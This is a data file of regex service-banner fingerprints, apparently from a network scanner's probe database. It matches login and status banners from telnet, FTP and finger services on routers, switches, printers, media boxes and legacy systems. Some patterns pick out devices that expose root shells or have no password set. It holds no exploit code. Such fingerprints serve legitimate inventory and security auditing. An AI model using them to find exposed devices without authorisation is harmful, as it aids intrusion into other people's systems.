+\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03ADSL2\+ Wireless Router (\w+) \r\nSoftware Version: ([\w.]+)\r\nLogin name: +\xff\xfb\x01Symbol Access Point User/Admin password: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x18\xff\xfd\x1f\xff\xfd \xff\xfd!\xff\xfe\"\xff\xfc\"Username Access Verification\r\n\r\nLogin : +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05Welcome to Telnet Server ([\w._-]+)\r\n\x1b\[0m\x1b\[2J\x1b\[05;28H(SM\w+) Managed Switch\x1b\[07;22H\x7fTallahasseeAdmin-Block\x1b\[15;30Husername:\x1b\[17;30Hpassword:\x1b\[15;39H +\r\n\r\nPassword required, but none set\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1fWelcome to your TiVo\r\n\r\n=\[tivo:root\]-# +\xff\xfa\x18\x01\xff\xf0\xff\xfb\x01\xff\xfb\x03AMBIT Cable Modem\r\n\r\nlogin: +refused in\.telnetd from [-\w_.]+ logged\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Access DENIED\.\r\n +\xff\xfb\x01\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b\[2K\x1b\[4;1H\x1b\[2K\x1b\[5;1H\x1b\[2K\x1b\[6;.*Business Policy Switch 2000 +BeanShell ([-\w_.]+) - by Pat Niemeyer \(pat@pat\.net\)\nbsh % +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x1f\r\n\(Aruba800\) \r\nUser: +\xff\xfb\x01\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b\[2K\x1b\[4;1H\x1b\[2K\x1b\[5;1H\x1b\[2K\x1b\[6;1H\x1b.*BayStack 420 +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03SHARP (MX-\w+) Ver ([-\w_.]+) TELNET server\. +\xff\xfb\x01\xff\xfb\x03Welcome to (DCS-\w+) telnet daemon\r\n\r\nPassword: +\xff\xfb\x01\r\nVoIP Phone V([-\w_.]+) settings\r\nPassword: +\xff\xfb\x01\r\nAIRAYA login: +\xff.\x01\0?\xff\xfd.*Welcome to ViewStation.*Password: +AD6680 Gateway Software\r\n[-\w_]+ \(MAC ([\w:]+)\)\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nHP ProLiant BL p-Class C-GbE2 Interconnect Switch A\.\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03Netgear DM111 ADSL2\+ Modem \r\nSoftware Version: ([-\w_.]+)\r\nLogin name: +\xff\xfb\x03\xff\xfb\x01\r\n\r\n\*+\r\n\* Welcome to Print Server \*\r\n\* +Telnet Console +\*\r\n\*+\r\n\r\nServer Name : ([\w._-]+)\0\0\0\0\0\0\r\nServer Model : 2U1P Print Server\0+\r\nF/W Version : ([\w._-]+).*\r\nMAC Address : ([\w ]+) +\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01\r\n\r\nMMC Technology Telnet\r\nMW-3000AP \w+\( Combo ([-\w_.]+) \)\r\n\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r.*\n\r\n\rSoftware Release R([-\w_.]+)\([^)]+\)\n\rCopyright \(c\) 2001-2003 by D-Link, Inc\.\n\r\n\rlogin: +\xff\xfb\x03\xff\xfb\x01\r\nWelcome to the WhatRoute TELNET Server\.\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nCNU-550pro login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03picotux login: +\xff\xfb\x03\xff\xfd\x18\xff\xfb\x01\xff\xfd\x1f\xff\xfd!\r\nCadant C3 CMTS\r\n +\r\n\(c\) Copyright 2005, Extron Electronics, IPL T S2, V([\d.]+), +\xff\xfb\x01\xff\xfb\x03\r\n.*HM410dp ADSL2\+ Router\r\n\r\nLogin: +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03NS-30G Ver ([-\w_.]+) TELNET server\.\r\0\nCopyright \(c\) \d+ KYOCERA +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\n\r\nWelcome to X4100 version V\.([-\w_.]+) Rev\. (\d+) \(Patch (\d+)\) from [\d/]+ [\d:]+\r\nsystemname is ([-\w_.]+), +\xff\xfe\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03login: +\xff\xfb\x03\xff\xfb\x01\r\nZyXEL Corporation Embedded Telnet Server \(c\) 2000-2003\r\n +\xff\xfb\x01\xff\xfb\x03\*\*\* Lantronix UDS1100 Device Server \*\*\*\r\0\nMAC address (\w+)\n\r\0Software version V([\w._-]+) \((\d+)\) \r\0\nPassword : +\xff\xfb\x01\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\*+\r\n\* Copyright\(c\) 2004-2006 3Com Corp\. and its licensors\. +\xff\xfd\x03\xff\xfb\x01\r\n\r\nProduct type: Avaya (\w+) Media Gateway Release ([\w._-]+)\r\n\r\n\r\n\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPLi dm500 Jade \d+ \(based on ([\w._-]+)\)\r\n\rwelcome on your dreambox! - Kernel ([\w._-]+) \([\d:]+\)\.\r\n\rdm500 login: +\r\nSorry, this system is engaged by a rlogin session\.\r\nHost IP address: ([\d.]+)\.\nLogin name: ([\w._-]+)\.\n +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01.*\r\n\r\nUser Access Verification\r\n\r\nUsername: +Connected\r\nUse log command to LOGON\r\n +\xff\xfb\x01\xff\xfb\x03Grandstream ([\w-]+) Command Shell\r\nPassword: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Grandstream ([\w-]+) V([\w.]+) Command Shell +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03AH4021\r\nLogin: +\xff\xfb\x01\xff\xfb\x03\n\r\0SNTP Version ([\d.]+) Server ([\w._-]+)\n\r\0\r\0\nMAC address (\w+)\n\r\0Software version V[\d.]+ \(\d+\) ([\w._-]+)\r\0\nPassword : +uShare \(([\w._-]+)\) \(Built .*\)\nFor a list of registered commands type \"help\"\n\n> +SMPlayer ([\w._-]+)\r\nType help for a list of commands\r\n +Sorry, already connected\.\r\n| p|Slirp PPP/SLIP-on-terminal emulator telnetd +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\r\nCopperJet ([\w._-]+) RouterPlus .*\r\nFirmware version: ([\w._ -]+)\r\nAllied Data Technologies\r\n\r\nPlease login: +\xff\xfb\x01\xff\xfb\x03Welcome to the Windows CE Telnet service on MP370\r\n\r\nPocket CMD v ([\w._-]+)\r\n\\> \n\r\n\\> \\> +\xff\xfb\x01\r\n3Com Access Point 7760 login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03 login: +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03PRICOM 3100 Ver ([\w._-]+) TELNET server\.\r\0\nCopyright \(C\) 2002-2004 silex technology, Inc\.\r\0\nlogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\r\n\r\r\nWelcome to Aerohive Wireless Product\r\r\n\r\r\nlogin: +\xff\xfb\x01\xff\xfb\x03\r\nLexmark International Telnet\r\n\r\nlogin: +\xff\xfb\x03\xff\xfb\x01Alcatel-Lucent: A7510\r\nA7510_(R\d+) .*\r\n\r\n\r\nLogin: +\xff\xfd\x18\xff\xfd\x1f\xff\xfd!\xff\xfd\x17\xff\xfb\x01\xff\xfb\x03\xff\xfd \xff\xfd#\r\n\r\n Welcome to OpenVMS \(TM\) VAX Operating System, Version V([\w._-]+) \r\n\r\n\r\0Username: +\xff\xfb\x01\xff\xfb\x03\r\n\r\n>>> System ([\w._-]+) - OpenVMS Alpha V([\w._-]+) <<<\r\n\r\n\rUsername: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nGbE2c L2/L3 Ethernet Blade Switch for HP c-Class BladeSystem\.\r\n\r\nCopyright\(C\)2003 Hewlett-Packard Development Company, L\.P\.\r\n\r\n\r\nEnter tacacs username: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03U\.S\. Robotics ADSL 4-Port Router\r\nLogin: +\xff\xfb\x01\xff\xfb\x03\n\r\0\*\*\* Mitsubishi ProjectorView Server \*\*\*\r\0\nMAC address (\w+)\n\r\0Software version V([\w._-]+) \((\d+)\) MELCO\r\0\n\n\r\0Press Enter for Setup Mode \n\r\0 +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n === IMPORTANT ============================\r\n Use 'passwd' to set your login password\r\n this will disable telnet and enable SSH\r\n ------------------------------------------\r\n\r\n\r\nBusyBox v(.*) built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n ___ ___ ___ \r\n\( _`\\ _ /'___\)'___\) Bifferboard mini-distribution v([\w._-]+)\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03 =======================\r\n DSL-500B \r\n =======================\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nWelcome to Linux \(ZEM500\) for MIPS\r\n\rKernel ([\w._-]+) \w+ on an MIPS\r\n\rZEM500 login: +\xff\xfb\x01\xff\xfe\x01Connected\r\n\n\rAironet BR500E V([\w._-]+) Main Menu +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03TrioLink \(ADSL IAD\)\r\nLogin: +Linux ([\w._-]+) \[INSTALL: [\d-]+\]\nLASTPATCH: [\d:-]+\n +\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\x1b\[0;37;40m\x1b\[2J\x1b\[1;1HLogin Name: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03Xcelerator IP \r\nLogin: +odec=\d+ u=\d+, p=\d+, i=\d+, max entries = \d+ \r\n\d+: IMGREQUEST: request_stats, image buffers available = \d+ \r\n\d+: MAIN: (\d+) images\(J=\d+, P=\d+, I=\d+\) stored on disk in last minute +\r\nSiemens 5940 T1E1 \[COMBO\] Router \([\w._-]+\) v([\w._-]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Username: +\xff\xfb\x01\xff\xfb\x03\r\n\r\nWelcome to Dinion-IP-NWC [\d.]+ from [\d.]+\r\n +\xff\xfb\x03\xff\xfb\x01\xff\xfe\x01\xff\xfd\0\r\nser2net port \d+ device (/dev/[-\w_]+) \[\d+ \w+\] \(Debian GNU/Linux\)\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfe\x01\n\rTerminal shell v1\.0\n\r\rCopyright \xa92008 Motorola, Inc\. All rights reserved\.\n\r\rNetopia Model ([\d-]+)(?: AnnexA)? High-Power Wireless DSL Ethernet Managed Switch\n\rRunning Netopia SOC OS version ([\w.-]+ \(build \w+\))\n +\xff\xfb\x01\xff\xfb\x03ssss ssss sss s ss sss sss sss sssss \r\n s s s s s s s s s s s s s \r\n s s s s s s s s s s s \r\n s s ss s ss ssss s sss s ssss s s sss \r\n s s s s s s s s s s s s s s s \r\n s s s s s s s sss s s s s s s \r\n s s s s s s s s s s s s s s s s s \r\nssss ssss ssssss sss sss sssss ss sssss sss sss sssss\r\nLogin: +\r\nPRO2 Control Console\r\n +\w{12}\r\nETHMAC ([0-9a-f:]+)\r\nWIFIMAC ([0-9a-f:]+)\r\n> +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nWireless AP Manager Console [^\r\n]+\r\n please enter your password: +\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfb\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05Login: +\xff\xfb\x01\xff\xfb\x03\r\n\r\nYou are connected to configuration tool\r\nEnter the password: +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05\r\n\*\*\* Welcome to VTM \*\*\*\r\n\r\n\r\n\rLogin : +\r\nCEN-IDOC Control Console\r\n\r\nCEN-IDOC> +\xff\xfb\x01\r\nWelcome to Ring v([\d.]+) Copyright \(C\) AMX Corp\. 2002-2003\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03TESTING MODEL ADSL Router\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\[([^]]*)\]\[([^]]*)\]\[([^]]*)\]\r\n +\xff\xfe\"\xff\xfb\x01\x1b<\x1b>\x1b\[\?25l\x1b\[0m\x1b\[2J\x1b\(B\x1b\)0\x0f\x1b\[7m\x1b\[f Areca Technology Corporation RAID Controller +\xff\xfb\x01\xff\xfb\x03\r\n\r\n\r\n\r\n\*{76}\r\n\r\n +Minolta Network Configuration Utility\r\n +Minolta\r\n +Version ([\w.]+)\r\n +\xff\xfd\x03\xff\xfe\x01\xff\xfb\x01\s+ZebraNet Internal Wired PS Configuration Utility\r\n\r\n Type your password\. Press Enter when finished\.\r\n\r\n Password: +\xff\xfb\x01\n\rWelcome to TrueTime Network Interface\n\r\rUser name: +MythFrontend Network Control\r\nType 'help' for usage information\r\n---------------------------------\r\n# +\x1b\[0m\r\nWelcome to (IC-\d+)!\r\n\r\n\x1b7\x1b\[\?25l\x1b\[501;501H\x1b\[6n\x1b8\x1b\[\?25h\r\x1b\[0m\x1b\[1mIC-\d+ # \x1b\[0m\x1b\[J\r\x1b\[10C +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\x0c\x1b\[2JEnter Password: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\r\n\rWelcome to DreamBox\.\r\n\rRunning under Kernel ([\w._-]+) \.\r\n\rBased on (Gemini [\w._-]+ GUI)\.\r\n\rKernel and utilities compiled by SatDream\.\r\n\r\r\n\r\r\n\rhttp://www\.satderam\.ru , info@satdream\.ru , dreambox@satdream\.ru\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nBNT Layer 2/3 Copper Gigabit Ethernet Switch Module for IBM BladeCenter\.\r\n\r\n\r\nEnter password: | p|Nortel Layer 2/3 Gigabit Ethernet switch for IBM BladeCenter +\xff\xfb\x01\xff\xfd\"\r\n##### #### ## ## #### #####\r\n## ## ## ## ## # ## ## ## ##\r\n## ## ###### ####### ## #####\r\n## ## ## ####### ## ## ##\r\n## ## ##### ## ## #### ######\r\n A Butter Team Creation\r\n\r\nPassword : +\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfe\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05TiMOS-([\w._-]+) cpm/hops ALCATEL SR (\w+) +\xff\xfb\x01\xff\xfb\x03\r\n\x1b\[1;1H\x1b\[2J\r\n\r\nObeh\xf6riga \xe4ga ej tilltr\xe4de\r\n\r\n\xf6vertr\xe4delse beivras\.\r\n\r\n\rUsername: +\n\rTA-005-FXO1-122M : CLI\n\rLogin : +\xff\xfe\x01\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x18Georgia SoftWorks Telnet Server for Windows NT/2000/XP/2003/Vista/2008 Ver\. ([\w._-]+)\n\rEvaluation copy, \d+ users enabled\. Expiration date is ([\d/]+)\.\n\r\n\rUser \d+ of \d+\n\r\n\rlogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\+{79}\r\n\r\+{33}#############\+{33}\r\n\r\+{28}###### ######\+{28}\r\n\r +\xff\xfb\x01\xff\xfb\x03BR-telnet@(FES\w+) Router> +\xff\xfb\x01\xff\xfb\x03\r\n\r\nCopyright \(c\) 2005 - 2008 Enterasys, Inc\. All rights reserved\.\r\n\n\r\n\r\n\r\0Username: +\r={74}\n\rTransition Networks Telnet Server\n\rSystem name: SMKG-PKGEAST-([\w._-]+)\n\rPress CTRL-D to disconnect\.\n\rEnter password: +\xff\xfb\x03\xff\xfb\x01\r\n \*{73}\r\n This is a private system\. \r\n Do not attempt to login unless you are an authorized user\. \r\n Any authorized or unauthorized access or use may be monitored and can\r\n result in criminal or civil prosecution under applicable law\.\r\n \*{73}\r\n\r\nMP login: +\xff\xfe\"\xff\xfb\x01\x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[5B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[6B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[7B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9B\x1b\[2B Verify Password \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9B\x1b\[4B \x0e\x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[8C\x1b\[9B\x1b\[1Blqqqqqqqqqqqqqqqqqqqk\x1b +Sorry, new remote sessions are disallowed by current switch configuration\. +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\x1b\[H\x1b\[J\r\nWireless Router Manager Console , Version : ([\w._-]+)\r\nPlease enter your password : +\xff\xfb\x01\xff\xfb\x03\*{60}\r\n\* WARNING ALERT: AUTHORIZED USERS ONLY! +\*\r\n\* +\*\r\n\* All activities conducted on this system may be monitored \*\r\n\* and recorded\. If you are not an authorized user, log off \*\r\n\* immediately\. Illegal entry, misuse, and / or criminal \*\r\n\* activity will be documented and prosecuted to the full \*\r\n\* extend of the law\. +\*\r\n\*{60}\r\n\r\n\r\nPress to accept and continue the login process\.\.\.\.\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\x1b\[2J\x1b\[1;1H\x1b\[1mwb-adtran-\w+ ADTRAN (TDU-\w+)\x1b\[0m\x1b\[2;1HConnecting\.\.\.\. +\r\n%connection closed by remote host!\0 +Sorry, telnet is not allowed on this port! +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nBUFFALO INC\. LinkStation series HS-DHGL\(JINMU\)\r\n\rFENCHURCH login: +\nFelix Remote Shell Console:\r\n============================\r\n\r\n-> +\r\n\r\nBackup Server Telnet Session\r\n\r\nUser: +\xff\xfb\x01\xff\xfd\"\[game001\] remote control session\.\r\nPassword:\0 +\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[3;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HProCurve J\w+ Switch ([\w-]+)\r\n\rSoftware revision ([\w._-]+)\r\n +\xff\xfb\x01\r\nNetDVRDVS: +nodnsquery/[\d.]+ is not authorized to use the telnet proxy\r\n +\xff\xfc\x01\xff\xfd\"ixProxy V([\d.]+), Copyright \(C\) \d+ Ixia Communications\r\nEnter target port ip address as login name \(example: 10\.0\.1\.1\)\r\nlogin: +\0\0\0H\0\0\0\x02\x0fTimeEdit131\. +0301&<\x16\0\x84\xc7\x02\xe0\xe1\xb1\x008\x13\x1e\x0b\x80<\x16\0\xc7\t\x8f\x05\xc0\xf0X\0\x1c\xc2c\x01p\x1e\x0b\x80\xe3c\x01p\xdcX\0\x1c7\x8f\x05\xc0q\x0b\x80\xe3F\xc7\x02\xe0\xb8,\0\x8e\x1b\xb1\x008n\x05\xc0q\xa3\x008n\xb4\x02\xe0\xb8\xd1\x01p\xdch\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x12\0\x03\0\x04\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x12\0\r\0\x03\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x9a\x20\xd0Z\x1e\x1b\xa3\*\xf2\xdd\xe2\(\xc3sp&\xda\xe4Yp\xdbET\xf9\x8cc\xc24\*Y\xbe\xb3\xba\xd6%\xf5\xb668\xad\xab>@D<\x01\xdd>\)\xdb\x18\xf55\xd1\xba\x96\x1c\x17\x17\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\x01 +\x0f\0\n\0\x01\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x0b\0\0\0GBXRemote 2 +VTUN server ver \. (\d[-.\w /]+)\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +VTUN server ver \(.*\) (\d[-.\w /]+)\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +250 OK moleSoftware VHCS2 Server Welcomes You !\r\n +TrueWeather\r\n\r\n> +\x96\xfeS\xab +\+ read portFile\n\+ head -1\n\+ find /var/websm/ +([-\w_.]+) xine-ui ([\d.]+) remote server\. Nice to meet you\.\n +Vty password is not set\.\r\n +\r\nUser Access Verification\r\n\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfe\"\xff\xfd\x1fPassword: +bp[-\w]+: error while loading shared libraries: libstdc\+\+-libc6\.2-2\.so\.3: cannot open shared object file: No such file or directory\n +\0\x0e@........\0\0\0\0\0 +\0\*@.*\0\0\0\0\0 +\0<\xaa\xc5\r\^\xf7\x1b\xd1\xe1a/\xe8\x17P\x9dOb\xbb\x93\x87\xe0\xf3v\x81K\xa4!\xe6\xc7\x01\x977u5A\xd1M\x1b;\xc7\xcb\x87\xb5\x87\xf3~\xc8w\xef\xd3\x87eA\0\^\xbf\xc5\x93i\xf6\x87 +\xa5A\0\x01\0\0\0,\0\0\0\x02\0\0\0L\0\0\0\x08Connect\0\0\0\0x\0\0\0\x0857222\0\0\0 +.\x01.[\x02\x03]\x01\d+\0 +OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n +SuSE Meta pppd \(smpppd\), Version ([\d.]+)\r\n +\x7e\xff\x7d\x23\xc0\x21}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6\x7d\x27\x7d\x22\x7d\x28\x7d\x22\xc7\x7d\x23\x7e +\x7e\xff\x7d\x23\xc0\x21}!}!} }4}\"}&} } } } }%}&\x81\xf4\xdb\xc0}'}\"}\(}\"\xc4\x80~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\x81\xf4\xdb\xc0}'}\"}\(}\"\xc4\x80\x7e +-=QDS Task Refactoring Dev v([\w._-]+) Debug Tracing LiveView=-\r\nType quit or \^X to close connection\.\r\n\r\n +503 Service Unavailable\r\n\r\n\0 +Microsoft Windows XP \[Version [\d.]+\]\n\(C\) Copyright 1985-\d+ Microsoft Corp\.\n\nC:\\> +HELLO Welcome to Tunnel Vision \(([\d.]+)\)\n +\0\0\0\x04Z(\d)([1-9]\d) +Invalid request string: Request string is: \"\r\" +Feedback\nError=You need unique ID to command ABC! +#connected,all connect count: 1{\"event\":\"device_status\",\"data\":{\"wifi_name\":\"([^\"]+)\",\"wifi_signal\":\d+,\"battery\":\d+,\"batterycharging\":\w+,\"gsm_signal\":\d+,\"sms_unread\":\d+,\"sdcard\":\d+,\"updateinfo\":null}} +-\0\0\0\0| p|IBM OS/400 as-servermapd| o|OS/400 +\x99\xf3\0\0\0\0\0\0\xff\xff\xff\xff +\0\0\0\0\0\0\0\x08 +\[AUTHPOINT RESPONSE\]\r\nreturn_code=AUTHPOINT ERROR\r\nreturn_code_text=Error response parsed by base message object: Invalid or missing register #\r\nresponse=\r\nidentifier=\r\napproval_code=\r\n +Unknown command\r\n +Can't fork pty, bye!\n +Message received\n +Use of uninitialized value in transliteration \(tr///\) at /var/jchkmail/user-filter +Connection from \[[\d.]+\]\r\n\r\nEnter your account name and password\.\r\nSorry, there is no guest account\.\r\n\r\nUsername: +\r\nEnter your account name and password\.\r\n\r\nUsername: +\n\x03 +unrecognized op\n\x03 +\nunrecognized op\n\n\x03 +\n(\d+)\n(\d+)\n(\d+) +\xc0\0\x01\0....\0\0\0\x03 +200-At least a module and a command must be specified\r\n200-At least a module and a command must be specified\r\n +\nWelcome to the Computone IntelliServer `([\w._-]+)'\nRunning cnx kernel release ([\w._, -]+)\n\npt-ses day time owner command\n +Idle\r\n +UNKNOWN COMMAND\n +_err=refused%20by%20workers\r\n +ok\r\nunknown command\r\nunknown command\r\n +Expecting SSL \(optional\) and CONFIG as first commands\.\n +X01\r\nX01\r\n +Invalid FT GWADDR / START protocol\n +\x03Not a valid name\. This may because you left it blank or used invalid symbols\. Please try again\.\n +Finger online user list request denied\.\r\n +Username Real name Idletime TTY Remote console location\n +Login Name Tty Idle Login Time Office Office Phone\r\n +\r\nIntegrated port\r\nPrinter Type: Dell Laser Printer ([-\w+.]+)\r\nPrint Job Status: (.*)\r\n +This is ([-\w_.]+) finger server\.\r\n\r\nPlease use username@domain format\.\r\n +\r\nIntegrated port\r\nPrinter Type: Lexmark ([^\r\n]+)\r\n +finger: /var/adm/lastlog open error\nNo one logged on\r\n +Debian GNU/Linux Copyright \(C\) 1993-1999 Software in the Public Interest\n.*You haven't specified a user\.\n\n A general listing is not provided to the public\. +\r\nPrinter Type: Lexmark Optra LaserPrinter\r\n +MSS485 Version V([\w._/-]+)\(([\w._-]+)\) - Time Since Boot: +220 Welcome to Stupid-FTPd server\.\r\n422 Too busy to play with you\.\r\n +520 invalid command\n +\xea\xdd\xbe\xef\0\0\0\x05\0\0\x000\0\0\x000\0\0..\0\0\0\x08\0a\0f\0f\0s\0p\0r\0n\0g\0\0\0\0\0\0\0\0 +220 Inactivity timer = \d+ seconds\. Use 'site idle ' to change\.\r\n221 Goodbye \(badly formated command seen\)\. You uploaded 0 and downloaded 0 kbytes\.\r\n221 Goodbye \(badly formated command seen\)\. You uploaded 0 and downloaded 0 kbytes\.\r\n +220 \r\n500 Unknown command: \"\"\r\n500 Unknown command: \"\"\r\n +220 ([-.\w]+) FTP Server ready \.\.\.\r\n530 \r : User not logged in\. Please login with USER and PASS first\.\r\n530 \r : User not logged in\. Please login with USER and PASS first\.\r\n +220 \"Welcome to Bot FTP service\.\"\r\n331 Please specify the password\.\r\n230 Login successful\. Have fun\.\r\n +220 OK\n226 OK\n +220 Welcome to pyftpd\. Happy downloading\.\r\n500 I'm gonna ignore this command\.\.\. maybe later\.\.\.\r\n +220 ([\w._-]+) server ready\.\r\n502 command not implemented\.\r\n502 command not implemented\.\r\n +220 UnleashX FTP ready\.\r\n503 Login with USER first\.\r\n +220 ps2ftpd ready\.\r\n500 Not understood\.\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfc\"\r\n\r\n\n\rauthentication failed!\n\rpassword: +\xff\xfc\"\xff\xfb\x01\r\nPassword: \r\nbad password\r\n| p|Campbell Scientific NL-100/105 Ethernet-to-serial bridge telnetd +FlashCONNECT ([\d.]+) invalid message\.\n +\\0\0\0\xd4\x17\0\0\x01\0\0\0\x05\0\0\0\x01\0\0\0\x05\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\nBad connect string! +{type INIT} {up \d+} {auth \d+} 